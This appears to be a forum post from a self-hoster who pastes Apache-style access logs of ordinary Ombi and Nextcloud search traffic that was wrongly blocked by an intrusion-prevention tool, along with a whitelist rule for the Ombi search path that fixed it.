xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/207784 HTTP/1.1" 200 17387 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/458171 HTTP/1.1" 200 24607 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/282804 HTTP/1.1" 200 16735 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464274 HTTP/1.1" 200 17450 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9627 HTTP/1.1" 200 27384 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/19199 HTTP/1.1" 200 24705 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/207234 HTTP/1.1" 200 21472 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/210370 HTTP/1.1" 200 24290 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/302551 HTTP/1.1" 200 18473 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/114428 HTTP/1.1" 200 21482 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/5609 HTTP/1.1" 200 21907 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/325439 HTTP/1.1" 200 24196 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/121523 HTTP/1.1" 200 19659 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/173330 HTTP/1.1" 200 20875 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/434448 HTTP/1.1" 200 20410 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/1040 HTTP/1.1" 200 45393 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/3686 HTTP/1.1" 200 34423 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/9347 HTTP/1.1" 200 23596 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/113332 HTTP/1.1" 200 38544 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/5608 HTTP/1.1" 200 22325 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/169818 HTTP/1.1" 200 25061 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/291345 HTTP/1.1" 200 3767 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/399377 HTTP/1.1" 200 29960 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/449345 HTTP/1.1" 200 19430 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/661818 HTTP/1.1" 200 19007 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/383934 HTTP/1.1" 200 18529 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/796975 HTTP/1.1" 200 18617 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/464260 HTTP/1.1" 200 21611 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/399377 HTTP/1.1" 200 29960 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/29005 HTTP/1.1" 200 36478 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/19597 HTTP/1.1" 200 5371 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Movie/400574 HTTP/1.1" 200 41162 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/21220 HTTP/1.1" 200 76695 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/75686 HTTP/1.1" 200 4360 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/10918 HTTP/1.1" 200 60954 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/41571 HTTP/1.1" 200 27939 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/89293 HTTP/1.1" 200 20731 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/63307 HTTP/1.1" 200 17672 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/95226 HTTP/1.1" 200 76706 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/105875 HTTP/1.1" 200 23833 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/111115 HTTP/1.1" 200 72639 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/66324 HTTP/1.1" 200 62873 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/117883 HTTP/1.1" 200 9245 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/66312 HTTP/1.1" 200 46578 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /images/default_movie_poster.png HTTP/1.1" 404 575 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [07/Aug/2022:23:03:26 +0200] "GET /ombi/api/v2/search/Tv/moviedb/64190 HTTP/1.1" 200 1214797 "https://example.com/ombi/discover/actor/15140" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:103.0) Gecko/20100101 Firefox/103.0"

following whitelist rule fixed this:
- “evt.Parsed.request contains ‘/ombi/api/v2/search’”

10

here is me getting blocked while using nextcloud:

xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings_apps/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/comments/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/cookbook/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1566 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1563 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/files/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 2030 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/circles/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1563 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck-comment/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 997 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-conversations/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/contacts/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1185 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/calendar/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1361 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/tasks/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/jitsi/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/notes/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1564 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/poll/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message-current/search?term=doc&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/apps/theming/img/core/filetypes/x-office-document.svg?v=0 HTTP/1.1" 200 1299 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=4441 HTTP/1.1" 404 857 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/SyncPC/Documents HTTP/1.1" 207 6320 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/SyncPC/Pictures HTTP/1.1" 207 1178 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - username [08/Aug/2022:10:58:59 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/.Notes HTTP/1.1" 207 1169 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=254153 HTTP/1.1" 200 1387 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=250723 HTTP/1.1" 200 5103 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/cookbook/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/Stamm HTTP/1.1" 207 1171 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings_apps/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:58:59 +0200] "GET /nextcloud/core/preview?x=32&y=32&fileId=249763 HTTP/1.1" 200 2097 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/Ma+Ri HTTP/1.1" 207 1173 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/circles/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/comments/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - username [08/Aug/2022:10:59:00 +0200] "PROPFIND /nextcloud/remote.php/dav/files/username/LB.systems HTTP/1.1" 207 1173 "-" "Mozilla/5.0 (Windows) mirall/3.5.4stable-Win64 (build 20220802) (Nextcloud, windows-10.0.19044 ClientArchitecture: x86_64 OsArchitecture: x86_64)"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/files/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1537 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 999 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/deck-comment/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 997 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-conversations/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1006 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/contacts/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/calendar/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/tasks/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1001 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/notes/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/jitsi/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1003 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/poll/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/settings/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
xx.xxx.xx.xxx - - [08/Aug/2022:10:59:00 +0200] "GET /nextcloud/ocs/v2.php/search/providers/talk-message-current/search?term=document&from=%2Fnextcloud%2Fsettings%2Fapps%2Finstalled%2Fonlyoffice HTTP/1.1" 200 1000 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0"
